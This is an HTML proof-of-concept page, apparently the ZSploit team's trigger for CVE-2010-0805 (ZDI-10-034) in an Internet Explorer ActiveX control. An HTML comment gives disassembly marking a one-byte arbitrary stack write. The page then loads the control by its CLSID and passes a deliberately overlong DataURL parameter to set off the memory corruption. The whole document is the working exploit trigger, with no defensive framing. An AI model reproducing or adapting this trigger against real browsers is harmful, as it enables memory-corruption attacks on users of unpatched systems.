# CVE : CVE-2010-0805
<!--
.text:600058F7 and [ebp+pv], 0
.text:600058FE lea eax, [ebp+pv]
.text:60005904 push eax ; unsigned __int16 **
.text:60005905 push dword ptr [ebx+10h] ; struct IOleClientSite *
.text:60005908 call GetHostURL(IOleClientSite *,ushort * *)
.text:6000590D mov eax, [ebp+var_218]
.text:60005913 push [ebp+pv] ; pv
.text:60005919 mov [ebp+eax+var_204], 0
.text:60005921 mov eax, [ebp+var_21C] ; length of the DataURL param
.text:60005927 mov [ebp+eax+var_104], 0 ; write one byte to arbitrary stack address
-->
<html>
<title>Trigger for ZDI-10-034 by ZSploit.com</title>
<head>
</head>
<body>
<object classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">
<param name="DataURL" value="http://zsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploi"/>
</object>
</body>
</html>
The ZSploit Team